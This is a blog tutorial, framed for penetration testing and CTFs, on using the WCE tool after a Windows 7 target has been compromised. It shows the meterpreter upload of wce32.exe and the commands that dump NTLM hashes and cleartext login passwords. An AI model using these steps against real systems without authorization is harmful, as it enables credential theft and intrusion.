Post Exploitation With Windows Credentials Editor (WCE)

What is WCE?

A tool that allows you to harvest hashes from Windows.

 

Functionality

WCE can be used for a variety of functions:

  • It can perform pass-the-hash on Windows.
  • It can obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.)
  • Dump cleartext passwords entered by users at login.

 

WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing. It supports Windows XP, 2003, Vista, 7, 2008 and Windows 8.

It comes prepackaged with Kali.

Directory

usr/share/wce/

 

How it is used

  • As mentioned earlier, it is used in penetration tests and in CTF’s that utilize Windows.
  • It works extremely well in post-exploitation when harvesting credentials.
  • All you need to do is upload the wce.exe executable to the target system and run it.

 

Demonstration

Target OS: Windows 7 VM

We have already exploited the target and have spawned a meterpreter reverse shell. We can now begin our credential harvesting.

  • We can use the Meterpreter upload functionality to upload the wce32.exe executable to our target system. Ideally, we want it in the system32 folder with admin privileges.

 

Upload /usr/share/wce32.exe

 

Depending on the target system architecture, you can specify the appropriate wce executable (32 or 64).

 

Using WCE

 

  • Viewing the help menu

Wce32.exe -h

  • To list all the hashes of all users

Wce32.exe

 

 

Retrieving user passwords in cleartext

Wce32.exe -w

 

Note: WCE will only display active user credentials and hashes.

 

Retrieving the NTLM hash

Wce32.exe -g <password>

 

Liked it? Take a second to support Alexis on Patreon!
Share this post

Leave a Reply

Your email address will not be published. Required fields are marked *

Releated

SSH Brute-force Protection With Fail2Ban

Fail2Ban is an intrusion prevention framework written in Python that protects Linux systems and servers from brute-force attacks. We can setup Fail2Ban to provide brute-force protection for SSH on our server, this will ensure that the server is secure from brute-force attacks and it also allows us to monitor the strength of the brute-force attacks […]

Share this post

Cracking WPA/WPA2 Passwords

Cracking WPA/WPA2 Passwords This test was carried out using the Alpha Long Range USB Adapter (AWUS036NHA) In this article, I will explain how to crack WPA/WPA2 passwords by capturing handshakes, then using a word list, to crack the password protected the access point. This is known as a dictionary attack. In this example, I will […]

Share this post